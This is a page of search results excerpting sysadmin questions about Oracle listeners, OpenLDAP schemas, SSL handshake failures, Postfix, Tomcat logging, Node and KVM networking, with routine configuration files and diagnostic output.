Search Results

Search found 14546 results on 582 pages for 'mod authz host'.

Page 493/582 | < Previous Page | 489 490 491 492 493 494 495 496 497 498 499 500  | Next Page >

  • starting oracle 10g on ubuntu, Listener failed to start.

    - by tsegay
    I have installed oracle 10g on a ubuntu 10.x, This is my first time installation. After installing I tried to start it with the command below. tsegay@server-name:/u01/app/oracle/product/10.2.0/db_1/bin$ lsnrctl LSNRCTL for Linux: Version 10.2.0.1.0 - Production on 29-DEC-2010 22:46:51 Copyright (c) 1991, 2005, Oracle. All rights reserved. Welcome to LSNRCTL, type "help" for information. LSNRCTL> start Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait... TNSLSNR for Linux: Version 10.2.0.1.0 - Production System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log Error listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC1))) TNS-12555: TNS:permission denied TNS-12560: TNS:protocol adapter error TNS-00525: Insufficient privilege for operation Linux Error: 1: Operation not permitted Listener failed to start. See the error message(s) above... my listener.ora file looks like this: # listener.ora Network Configuration File: /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora # Generated by Oracle configuration tools. SID_LIST_LISTENER = (SID_LIST = (SID_DESC = (SID_NAME = PLSExtProc) (ORACLE_HOME = /u01/app/oracle/product/10.2.0/db_1) (PROGRAM = extproc) ) ) LISTENER = (DESCRIPTION_LIST = (DESCRIPTION = (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1)) (ADDRESS = (PROTOCOL = TCP)(HOST = acct-vmserver)(PORT = 1521)) ) ) I can guess the problem is with permission issue, But i dont know where I have to do the change on permission. Any help is appreciated ... EDIT## When i run with the command sudo, i got this tsegay@server-name:/u01/app/oracle/product/10.2.0/db_1$ sudo ./bin/lsnrctl start LSNRCTL for Linux: Version 10.2.0.1.0 - Production on 30-DEC-2010 01:01:03 Copyright (c) 1991, 2005, Oracle. All rights reserved. Starting ./bin/tnslsnr: please wait... ./bin/tnslsnr: error while loading shared libraries: libclntsh.so.10.1: cannot open shared object file: No such file or directory TNS-12547: TNS:lost contact TNS-12560: TNS:protocol adapter error TNS-00517: Lost contact Linux Error: 32: Broken pipe

    Read the article

  • Removing/modifying LDAP objectclasses/attributes using olc

    - by Foezjie
    I'm having trouble using openldap's olc to modify a schema without shutting down the server. To test some things out, I made the following schema: objectIdentifier tests orgUlyssisOID:4 objectIdentifier testAttribute tests:1 objectIdentifier testObjectClass tests:2 attributeType ( testAttribute:1 NAME 'attr1' DESC 'attribuut 1' SYNTAX '1.3.6.1.4.1.1466.115.121.1.40' ) attributeType ( testAttribute:2 NAME 'attr2' DESC 'attribuut 2' SUP userPassword SINGLE-VALUE ) objectclass ( testObjectClass:1 NAME 'class1' DESC 'objectclass 1' SUP top STRUCTURAL MUST (attr1 $ attr2 ) ) And added it to a new schema called test. (cn={9}test.ldif in cn=schema). Now I can't seem to figure out how to delete class1 from that schema. I use the following LDIF (and tried lots of variations too, to no avail) dn : cn={9}test,cn=schema,cn=config changetype: modify delete: olcObjectClasses olcObjectClasses: ( testObjectClass:1 NAME 'class1' DESC 'objectclass 1' SUP top STRUCTURAL MUST ( attr1 $ attr2 ) ) Running ldapmodify -x -W -D cn=admin,cn=config -f test.ldif -d 0 gives no output. -d 1 gives this: ldap_create ldap_sasl_bind ldap_send_initial_request ldap_new_connection 1 1 0 ldap_int_open_connection ldap_connect_to_host: TCP localhost:389 ldap_new_socket: 4 ldap_prepare_socket: 4 ldap_connect_to_host: Trying 127.0.0.1:389 ldap_pvt_connect: fd: 4 tm: -1 async: 0 ldap_open_defconn: successful ldap_send_server_request ber_scanf fmt ({it) ber: ber_scanf fmt ({i) ber: ber_flush2: 38 bytes to sd 4 ldap_result ld 0x7f2a8ccf3430 msgid 1 wait4msg ld 0x7f2a8ccf3430 msgid 1 (infinite timeout) wait4msg continue ld 0x7f2a8ccf3430 msgid 1 all 1 ** ld 0x7f2a8ccf3430 Connections: * host: localhost port: 389 (default) refcnt: 2 status: Connected last used: Mon Sep 10 11:29:57 2012 ** ld 0x7f2a8ccf3430 Outstanding Requests: * msgid 1, origid 1, status InProgress outstanding referrals 0, parent count 0 ld 0x7f2a8ccf3430 request count 1 (abandoned 0) ** ld 0x7f2a8ccf3430 Response Queue: Empty ld 0x7f2a8ccf3430 response count 0 ldap_chkResponseList ld 0x7f2a8ccf3430 msgid 1 all 1 ldap_chkResponseList returns ld 0x7f2a8ccf3430 NULL ldap_int_select read1msg: ld 0x7f2a8ccf3430 msgid 1 all 1 ber_get_next ber_get_next: tag 0x30 len 12 contents: read1msg: ld 0x7f2a8ccf3430 msgid 1 message type bind ber_scanf fmt ({eAA) ber: read1msg: ld 0x7f2a8ccf3430 0 new referrals read1msg: mark request completed, ld 0x7f2a8ccf3430 msgid 1 request done: ld 0x7f2a8ccf3430 msgid 1 res_errno: 0, res_error: <>, res_matched: <> ldap_free_request (origid 1, msgid 1) ldap_parse_result ber_scanf fmt ({iAA) ber: ber_scanf fmt (}) ber: ldap_msgfree ldap_free_connection 1 1 ldap_send_unbind ber_flush2: 7 bytes to sd 4 ldap_free_connection: actually freed So no real indication of an error. Where am I doing it wrong? Bonus question: If I have some entries of a certain objectclass, can I modify it (add/remove attributeTypes) without removing the entries? Thanks in advance for all help.

    Read the article

  • IPv6 working fine, IPv4 throws OpenSSL error

    - by jippie
    I am building a webserver ( http://blog.linformatronics.nl/ ), which functions just fine on both IPv4 and IPv6 and when using a non-SSL connection. However when I connect to it through https, IPv6 works as expected, but an IPv4 connection throws a client side error. Server side logs are empty for the IPv4/https connection. Summarized in a table: | http | https -----+-------+------------------------------------------------------- IPv4 | works | OpenSSL error, failed. No server side logging. -----+-------+------------------------------------------------------- IPv6 | works | self signed certificate warning, but works as expected Apparently the SSL tunnel isn't even set up, which accounts for the Apache logs being empty. But why does it work fine for IPv6 and fail for IPv4? My question is why is this OpenSSL error being thrown and how can I solve it? Below is some extra information about the setup. IPv6 https Command used to reproduce IPv6/https behaviour: $ wget --no-check-certificate -O /dev/null -6 https://blog.linformatronics.nl --2012-11-03 15:46:48-- https://blog.linformatronics.nl/ Resolving blog.linformatronics.nl (blog.linformatronics.nl)... 2001:980:1b7f:1:a00:27ff:fea6:a2e7 Connecting to blog.linformatronics.nl (blog.linformatronics.nl)|2001:980:1b7f:1:a00:27ff:fea6:a2e7|:443... connected. WARNING: cannot verify blog.linformatronics.nl's certificate, issued by `/CN=localhost': Self-signed certificate encountered. WARNING: certificate common name `localhost' doesn't match requested host name `blog.linformatronics.nl'. HTTP request sent, awaiting response... 200 OK Length: 4556 (4.4K) [text/html] Saving to: `/dev/null' 100%[=======================================================================>] 4,556 --.-K/s in 0s 2012-11-03 15:46:49 (62.5 MB/s) - `/dev/null' saved [4556/4556] IPv4 https Command used to reproduce IPv6/https behaviour: $ wget --no-check-certificate -O /dev/null -4 https://blog.linformatronics.nl --2012-11-03 15:47:28-- https://blog.linformatronics.nl/ Resolving blog.linformatronics.nl (blog.linformatronics.nl)... 82.95.251.247 Connecting to blog.linformatronics.nl (blog.linformatronics.nl)|82.95.251.247|:443... connected. OpenSSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol Unable to establish SSL connection. Notes I am on Ubuntu Server 12.04.1 LTS

    Read the article

  • it opens "open with" prompt whenever scheduled task run

    - by Shashwat Tripathi
    I am trying to run a .vbs file on every five minutes. I am trying to do this using windows task scheduler. In Actions tab - New Action, I select the file ("D:\Documents\FC3 Savegames\FC3.vbs") using open file dialog I have made all other setting properly. But whenever the task begin, It opens open with dialog every time. Once I choose Notepad to in open with dialog. Then Another dialog opens from Notepad saying Can not find D:\Documents\FC3.txt file. Do you want to create a new file with three buttons Yes, No and Cancel Help me what is wrong. I feel that white spaces in the file path causing the problem. Added later Well I just fixed this by setting path to shorthand ("D:\Documents\FC3Sav~1\FC3.vbs"). But it still opens "open with" dialog everytime. Now it has two main programs saying "Keep using Microsoft Windows Script Host" and Other Program. This dialog does not open when I run vbs file directly.

    Read the article

  • How do I install mod_dav_svn module on an Apache / MAMP server?

    - by fettereddingoskidney
    How do I install additional modules into my server configuration? Currently all of the other modules are installed in /Applications/MAMP/Library/modules...and I see that they are mod_*.so source files, but I cannot seem to get mine to end up here... :? I am trying to set up an SVN repository and use my Apache (MAMP) server to serve the repository. I am using the subversion installation that came (pre-installed?) on Mac OS X 10.5. The repository is working, but I cannot access it remotely through my MAMP server using a client program (Dreamweaver CS5). When I try, I get an error from Dreamweaver, saying: Cannot connect to host xxx: Connection refused. This, I believe, is because I have not properly configured my Apache server to serve the svn repository. So, I added the following lines to my httpd.conf file: <Location /subversion> DAV svn SVNPath /Applications/MAMP/htdocs/svn/ AuthType Basic AuthName "Subversion repository" AuthUserFile /applications/mamp/htdocs/.htpasswd Require ServerAdmin </Location> Restarted the server with the command $ /Applications/MAMP/Library/bin/apachectl -k restart I used this path because otherwise the default apachectl path is set to /usr/sbin/apachectl, which is the location of the pre-installed command on Mac OS X, since the OS comes packaged with a built-in Apache server. And I get the error: Syntax error on line 1153 of /Applications/MAMP/conf/apache/httpd.conf: Unknown DAV provider: svn I checked the upper portion of httpd.conf and see that dav_module (mod_dav.so) is loaded and is in fact in my the modules directory of my server. However, mod_dav_svn is not installed in that directory nor is it in the LoadModule portion of httpd.conf. So I need to install it, right? I have tried installing modules into my MAMP server before but was never successful...because I don't know how to do it. Can someone please walk me through how to install that module? Thanks for your time!

    Read the article

  • Change the order of IP addresses returned by ifconfig?

    - by erikcw
    I have an Ubuntu server with several IP addresses attached to it. 127.0.0.1 is listed as venet0 by ifconfig. I'm using Chef to configure the server. The problem is that chef is listing 127.0.0.1 as the IP address for the server instead of one of the server's "real" IPs. (apparent "ohai ipaddress" uses the first IP listed by ifconfig to determine the server's IP). How can I change the order so the servers main IP is listed first instead of the 127.0.0.1? Can venet0 be deleted and venet0:0 be "promoted" to take its place since 127.0.0.1 is already listed in the "lo" interface? lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:334 errors:0 dropped:0 overruns:0 frame:0 TX packets:334 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:16700 (16.7 KB) TX bytes:16700 (16.7 KB) venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 RX packets:7622207 errors:0 dropped:0 overruns:0 frame:0 TX packets:8183436 errors:0 dropped:1 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2102750761 (2.1 GB) TX bytes:2795213667 (2.7 GB) venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:XXX.XXX.XXX.XX1 P-t-P:XXX.XXX.XXX.XX1 Bcast:0.0.0.0 Mask:255.255.255.255 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 venet0:1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:XXX.XXX.XXX.XX2 P-t-P:XXX.XXX.XXX.XX2 Bcast:0.0.0.0 Mask:255.255.255.255 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 route -n route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.0.2.1 0.0.0.0 255.255.255.255 UH 0 0 0 venet0 0.0.0.0 192.0.2.1 0.0.0.0 UG 0 0 0 venet0

    Read the article

  • Win 2003 SBS - secure enough by default?

    - by Pekka
    I have to set up a Windows 2003 Small Business Server to work as a Subversion repository and possibly as an E-Mail server later. The machine is a virtual one, hosted with a hosting company, and freshly initialized. I used the Security Configuration Wizard to deactivate all server roles. After I install Subversion, I will open the necessary ports for the service; in addition, obviously, RDP will stay open so I can remote control the machine. Automatic updates are activated, and I will set up E-Mail notification every time somebody logs on to the server. I'm a programmer and not a professional systems administrator, so I would like to know whether you would regard this a sane and secure setup for a (publicly available) box to host sensitive code and/or E-Mail on. Is there anything in addition I should do to make the machine secure? Is there anything I can do on a long-term basis to keep the machine secure, apart from monitoring the event log (as far as I can make sense out of it), and seeing that any hotfixes are installed properly?

    Read the article

  • How to turn off Tomcat logging in Eclipse?

    - by kirdie
    I develop a Vaadin project in Eclipse that I start through Tomcat 6 which gets started directly by Eclipse. Tomcat prints an enormous amount of log messages though on each start which makes it hard to see the output of my own Application. I have already replaced all log levels in tomcat6/conf/logging.properties by WARNING (e.g. java.util.logging.ConsoleHandler.level = WARNING) but I still get many INFO messages. How can I turn this off or restrict the log messages to WARNING? An example of the messages Okt 26, 2012 12:16:36 PM org.apache.catalina.core.AprLifecycleListener init INFO: Loaded APR based Apache Tomcat Native library 1.1.24. Okt 26, 2012 12:16:36 PM org.apache.catalina.core.AprLifecycleListener init INFO: APR capabilities: IPv6 [true], sendfile [true], accept filters [false], random [true]. Okt 26, 2012 12:16:36 PM org.apache.tomcat.util.digester.SetPropertiesRule begin WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Context} Setting property 'source' to 'org.eclipse.jst.j2ee.server:saim' did not find a matching property. Okt 26, 2012 12:16:37 PM org.apache.coyote.http11.Http11AprProtocol init INFO: Initializing Coyote HTTP/1.1 on http-8080 Okt 26, 2012 12:16:37 PM org.apache.coyote.ajp.AjpAprProtocol init INFO: Initializing Coyote AJP/1.3 on ajp-8009 Okt 26, 2012 12:16:37 PM org.apache.catalina.startup.Catalina load INFO: Initialization processed in 879 ms Okt 26, 2012 12:16:37 PM org.apache.catalina.core.StandardService start INFO: Starting service Catalina Okt 26, 2012 12:16:37 PM org.apache.catalina.core.StandardEngine start INFO: Starting Servlet Engine: Apache Tomcat/6.0.32 Okt 26, 2012 12:16:37 PM org.apache.coyote.http11.Http11AprProtocol start INFO: Starting Coyote HTTP/1.1 on http-8080 Okt 26, 2012 12:16:37 PM org.apache.coyote.ajp.AjpAprProtocol start INFO: Starting Coyote AJP/1.3 on ajp-8009 Okt 26, 2012 12:16:37 PM org.apache.catalina.startup.Catalina start INFO: Server startup in 568 ms

    Read the article

  • Postfix enable SSL 465 failed

    - by user221290
    I have installed the Postfix and enabled SSL/TLS, just tested, I can sent email from port 25, 578, but cannot sent email from port 465, the log is: May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:SSLv3 write server hello A May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:SSLv3 write certificate A May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:SSLv3 write server done A May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:SSLv3 flush data May 26 17:24:06 mail postfix/smtpd[28721]: SSL3 alert read:fatal:certificate unknown May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:failed in SSLv3 read client certificate A May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept error from unknown[10.155.36.240]: 0 May 26 17:24:06 mail postfix/smtpd[28721]: warning: TLS library problem: 28721:error:14094416:SSL routines:SSL3_READ_BYTES:sslv3 alert certificate unknown:s3_pkt.c:1197:SSL alert number 46: May 26 17:24:06 mail postfix/smtpd[28721]: lost connection after CONNECT from unknown[10.155.36.240] May 26 17:24:06 mail postfix/smtpd[28721]: disconnect from unknown[10.155.36.240] My email server is: 10.155.34.117, and email client is: 10.155.36.240, the client error is: Could not connect to SMTP host: 10.155.34.117, port: 465. My Master.cf: smtps inet n - n - - smtpd -o smtpd_tls_wrappermode=yes My main.cf: smtpd_use_tls = yes smtpd_tls_auth_only = no smtpd_tls_key_file = /etc/pki/myca/mail.key smtpd_tls_cert_file = /etc/pki/myca/mail.crt smtpd_tls_CAfile = /etc/pki/myca/cacert_new.pem smtpd_tls_loglevel = 2 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s smtpd_tls_session_cache_database = btree:/etc/postfix/smtpd_scache Seems it's my certificate issue, but I have tried to grant the file many times...I have no idea on this, please help!

    Read the article

  • How to create domain or router-level workgroup (dd-wrt micro)

    - by Anthony
    In Windows, is active directory required for using "Domain" instead of "workgroup"? Do I need to register a domain with a DNS provider like godaddy? What I really want to do is set up my home LAN so that everyone connecting to the main router (which is everyone, which is about 30 people) can see each other. I've tried having everyone use the same work group name, still hit or miss. I tried setting the domain name and host name on the router itself, still nothing. I've tried joining the domain name I set instead of work group, and I get an AD error. But ideally, everyone who is connected to the main router should simply just see each other and any shared folders. I've had this problem when I was not the network admin on other large LANs, and I've never been able to figure out why sometimes people disappear or never see each other. I'd really prefer using the native sharing functionality in the OS to setting up an internal FTP or Samba server, etc. Any sure-fire ways to fix this? (maybe an open source clone of AD?) Thanks!

    Read the article

  • What is the ideal way to set up multiple FTP enabled web accounts on Fedora?

    - by Nicholas Flynt
    I'm setting up a test server for use as a web development platform, and I'd like to mimic as closely as I can a typical shared hosting setup. That is, I'd like my server to have multple user FTP accounts, each of which links to a directory containing the webroot of the site, and I'd like apache to be able to easily see and manupulate these files. I'll admit: I'm not as familiar with Fedora as I'd like, I run Ubuntu on my home box and SElinux is giving me some grief. My initial plan was to have each user FTP into their home directory, and put the web directory there as well, but SElinux throws a hissy fit when apache tries to access anything outside of its web directory, so that plan was a no go. Would it be wise to continue this route, and perhaps mount web directories in user home folders so that FTP could still be used to access them, even though apache saw them in var/www like it expects? Would it make more sense to set up custom FTP accounts and use a single FTP user on the server box? What's the general course of action on something like this? I'm using vsftpd right now to host web directories, which is why I'm liking the home directory approach (it's simple and secure) but of course there's bound to be a better way to go about it. Thanks. (I'll leave other things, like restricted DB access and such, to another post. I'm interested right now with just getting FTP and apache to play nice in a multi-user environment.) PS: For the record, an issue I ran into when doing all of this was that if apache isn't running as the same user as the FTP account is saving as, there are permissions errors when FTP creates files, requiring the remote user to chmod the files to fix it. A logical fix would be to run apache in a special group, put all web users in this group, and have FTP access default to giving this group read/write access to everything like apache would expect, but I never could figure out how to accomplish this. Bonus points and cake if you know a solution.

    Read the article

  • EngineX ignores Auth Basic?

    - by Miko
    I have configured nginx to password protect a directory using auth_basic. The password prompt comes up and the login works fine. However... if I refuse to type in my credentials, and instead hit escape multiple times in a row, the page will eventually load w/o CSS and images. In other words, continuously telling the login prompt to go away will at some point allow the page to load anyway. Is this an issue with nginx, or my configuration? Here is my virtual host: 31 server { 32 server_name sub.domain.com; 33 root /www/sub.domain.com/; 34 35 location / { 36 index index.php index.html; 37 root /www/sub.domain.com; 38 auth_basic "Restricted"; 39 auth_basic_user_file /www/auth/sub.domain.com; 40 error_page 404 = /www/404.php; 41 } 42 43 location ~ \.php$ { 44 include /usr/local/nginx/conf/fastcgi_params; 45 } 46 } My server runs CentOS + nginx + php-fpm + xcache + mysql

    Read the article

  • SSL connection hangs as client hello (curl, openssl client, apt-get, wget, everything)

    - by Niklas B
    Hi, I've run into a problem on my Debian VPS (a xen domU) regarding SSL. Namely almost all SSL connections hangs at client hello. For example: # curl -vI https://graph.facebook.com About to connect() to graph.facebook.com port 443 (#0) Trying 66.220.146.48... connected Connected to graph.facebook.com (66.220.146.48) port 443 (#0) successfully set certificate verify locations: CAfile: none CApath: /etc/ssl/certs SSLv3, TLS handshake, Client hello (1): It's the same when using the openssl client. However, some of the SSL traffic works (for example https://www.nordea.se). Server #uname -a Linux server.com 2.6.26-1-xen-amd64 #1 SMP Fri Mar 13 21:39:38 UTC 2009 x86_64 GNU/Linux It does however work on my Dom 0 (the main xen host). Apt-get I can't even run apt-get update with the debian security sources (hangs on reading headers) Open SSL At the begining I thought I had an old openssl client (0.9.8o-4) since I appeared to have a newer on the Dom 0 (0.9.8g-15+lenny8) but doing a manuanl update on the openssl deb didn't help. Open SSL Client This is the full output of when the openssl client hangs: http://pastebin.com/PAjwMap9 Closing thoughts I've Googled the crap out of this, and I'm not getting any further. I've seen problems with curl, apt-get etc. but they are all specific relating to the very application - not general for the system. Any thoughts?

    Read the article

  • Centos/Postfix able to send mail but not receive it

    - by Dan Hastings
    I have set up postfix and used the mail command to test and an email was successfully sent and delivered. The email arrived in my yahoo inbox BUT the sender also recieved an email in the Maildir directory saying "I'm sorry to have to inform you that your message could not be delivered to one or more recipients", even though the message was delivered. I tried replying from yahoo to the email but it never arrived. I have 1 MX record added to godaddy which i did last week. Priority0 Host @ Points to mail.domain.com TTL1 Hour Postfix main.cf has the following added to it myhostname = mail.domain.com mydomain = domain.com myorigin = $mydomain inet_interfaces = all mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain mynetworks = 192.168.0.0/24, 127.0.0.0/8 relay_domains = home_mailbox = Maildir/ I checked var/logs/maillog and found the following errors occuring postfix/anvil[18714]: statistics: max connection rate 1/60s for (smtp:unknown) at Jun 3 09:30:15 postfix/anvil[18714]: statistics: max connection count 1 for (smtp:unknown) at Jun 3 09:30:15 postfix/anvil[18714]: statistics: max cache size 1 at Jun 3 09:30:15 postfix/smtpd[18772]: connect from unknown[unknown] postfix/smtpd[18772]: lost connection after CONNECT from unknown[unknown] postfix/smtpd[18772]: disconnect from unknown[unknown] output of postconf -n alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases command_directory = /usr/sbin config_directory = /etc/postfix daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 2 home_mailbox = Maildir/ html_directory = no inet_interfaces = all inet_protocols = all mail_owner = postfix mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain mydomain = domain.com myhostname = mail.domain.com mynetworks = 168.100.189.0/28, 127.0.0.0/8 myorigin = $mydomain newaliases_path = /usr/bin/newaliases.postfix queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES relay_domains = sample_directory = /usr/share/doc/postfix-2.6.6/samples sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop unknown_local_recipient_reject_code = 550

    Read the article

  • Node js server not responding outside localhost centos

    - by David Martinez
    I'm running a basic express server from CentOS but for some reason it is not responding outside of localhost, I have tried everything I have found on google but nothing works so far. This is my express server: app.listen(3000,"0.0.0.0"); If I do curl http://localhost:3000/ in the server it works fine. If I curl to the ip of the server it doesn't work. I already changed my iptables num target prot opt source destination 1 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 2 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 3 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:3000 There is currently a apache server running on port 80 with no problems. I also tried setting a VirtualHost on apache but it didn't work either: <VirtualHost *:80> ServerName SubDOmain.MyDomain.com ProxyRequests off <Proxy *> Order allow,deny Allow from all </Proxy> ProxyPass / http://localhost:3000/ ProxyPassReverse / http://localhost:3000/ ProxyPreserveHost on </VirtualHost> There is another virtual host working fine that redirects to another DocumentRoot. I'm running Node on root for testing purpose, but the node application owner is another user. All folders have 705 and files 664 Edit: I stopped apache and run my node app on port 80 and it working fine, I could access node app from my ip and domain.

    Read the article

  • Amazon EC2 instance missing Network Interface

    - by Sergiks
    I am running Linux on a t1.micro instance at Amazon EC2. Once I noticed bruteforce ssh login attemtps from a certain IP, after litle Googling I issued the two following commands (other ip): iptables -A INPUT -s 202.54.20.22 -j DROP iptables -A OUTPUT -d 202.54.20.22 -j DROP Either this, or maybe some other actions like yum upgrade perhaps, caused the follwing fiasco: after rebooting the server, it came up without the Network Interface! I only can connect to it through AWS Management Console JAVA ssh client - via local 10.x.x.x address. Console's Attach Network Interface as well as Detach.. are greyed out for this instance. Network Interfaces item at the left does not offer any Subnets to choose from, to create a new N.I. Please advice, how can I recreate a Network Interface for the instance? Upd. The instance is not accessible from outside: cannot be pinged, SSH'ed or connected by HTTP on port 80. Here's the ifconfig output: eth0 Link encap:Ethernet HWaddr 12:31:39:0A:5E:06 inet addr:10.211.93.240 Bcast:10.211.93.255 Mask:255.255.255.0 inet6 addr: fe80::1031:39ff:fe0a:5e06/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1426 errors:0 dropped:0 overruns:0 frame:0 TX packets:1371 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:152085 (148.5 KiB) TX bytes:208852 (203.9 KiB) Interrupt:25 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) What is also unusual: a new micro instance I created from scratch, with no relation to the troubled one, was not pingable too.

    Read the article

  • Nginx + php-fpm - recv() error

    - by Ilya Biryukov
    I get the follow error in the nginx log [error] 17734#0: *6643 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: [cut], server: [cut], request: "GET /venues HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "[cut]" I have a dedicated box with 8 gb ram, quad core chip. Good server. Nginx, php-fpm & mysql all latest versions running under ubuntu 10.04 I only get this when I stress test the server with siege. If I increase the number of concurrent connections to 100, I can get up to 20% of all requests to fail. Furthermore, I don't get this on pages that have no mysql queries. And only a few failures on pages with moderate number of queries. Bit, I'm not sure if that's got to do anything with it. I have a feeling this is something to do with php. But I can't figure it out. Any suggestions of where to even start looking? Update: and the php error log is silent. No record of anything going wrong

    Read the article

  • correct file permissions for trac and git user to access gitolite server repos

    - by klemens
    hi, sounds like a stupid questions (to me), but i couldn't find any info. on my server i host some git repositories via gitolite, and have a trac for every repository. i have a user called git to push/pull from server (git clone git@server:repo). and trac is a apache vhost with mod_wsgi. this runs with the www-data user. so what riddles me (maybe because I have not much of a clue about file-permissions at all) is whats the best permissions setup (chown, chmod) for the git repositories (/home/git/repositories/...). www-data (or trac) needs to at least read permissions (i think). and git (or gitolite) needs obviously read/write permissions to push changesets. i tried a little bit around (i.e. adding www-data and/or git to the www-data/git group), but didn't got it right. at least one of the two don't work (git or trac). any suggestions are highly appreciated. regard, klemens

    Read the article

  • Is this "cache administrator" error my server's problem?

    - by Eoin
    Hey, I have a CentOS VPS running Apache with a phpBB installation. One specific user has received errors when posting a message or logging in to the forum. The following issue has arisen in parallel to installing nginx, which serves only the static files of my site. Not sure if this is only coincidence. Furthermore, my setup uses redirects (in some cases, double-redirects) to point the user to a different virtual folder. So, the forum is seen to be at /translation/ but the actual files are found in /phpbb/. I'm at a loss as to what may be the underlying issue. My server? The person's ISP? She has tested both at home and at work, with similar issues. While trying to process the request: GET /phpbb/index.php?sid=f62c927e7eb8f1d60a92dcc6fd918112 HTTP/1.1 Host: www.irishgaelictranslator.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-za Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.irishgaelictranslator.com/phpbb/ucp.php?mode=login Cookie: phpbb3_cipi4_u=96645; phpbb3_cipi4_k=; phpbb3_cipi4_sid=f62c927e7eb8f1d60a92dcc6fd918112; __utma=153470688.1232378553.1294664234.1294664234.1294664234.1; __utmb=153470688.9.10.1294664234; __utmc=153470688; __utmz=153470688.1294664235.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); style_cookie=null The following error was encountered: Invalid Response The HTTP Response message received from the contacted server could not be understood or was otherwise malformed. Please contact the site operator. Your cache administrator may be able to provide you with more details about the exact nature of the problem if needed.

    Read the article

  • centos 6.3 kvm external ip forwarding to guests

    - by user1111702
    I have a centos 6.3 server with kvm installed. The server has 4 external ips and one NIC. 176.9.xxx.xx1 176.9.xxx.xx2 176.9.xxx.xx3 176.9.xxx.xx4 I use the following configuration ifcfg-eth0 as slave to ifcfg-br0 the configuration in ifcfg-eth0 is DEVICE=eth0 ONBOOT=yes BRIDGE=br0 HWADDR=14:da:e9:b3:8b:99 and in the ifcfg-br0 DEVICE=br0 TYPE=Bridge BOOTPROTO=static BROADCAST=176.9.xxx.xxx IPADDR=176.9.xxx.xx1 NETMASK=255.255.255.0 SCOPE="peer 176.9.xxx.xxx" and I have 3 more aliases for br0 , br0:1 to get the trafic from the second external ip DEVICE=br0:1 IPADDR=176.9.xxx.xx2 NETMASK=255.255.255.248 ONBOOT=yes br0:2 to get the trafic from the third external ip DEVICE=br0:1 IPADDR=176.9.xxx.xx3 NETMASK=255.255.255.248 ONBOOT=yes br0:3 to get the trafic from the second external ip DEVICE=br0:1 IPADDR=176.9.xxx.xx4 NETMASK=255.255.255.248 ONBOOT=yes The above settings work fine and I recieve the trafic from all the external ips. My problem is that I want to pass the trafic from external ip to specific virtual guest on my server. ie trafic that comes from 176.9.xxx.xxx2 must pass to virtual machine 1 176.9.xxx.xxx3 must pass to virtual machine 2 176.9.xxx.xxx4 must pass to virtual machine 3 Can you please help me how to achieve this ? What are the settings on the host and what should I do to the guests. Thank you in advance

    Read the article

  • When should NTPd broadcast/broadcastclient be used instead of client/server or peer modes?

    - by Luke404
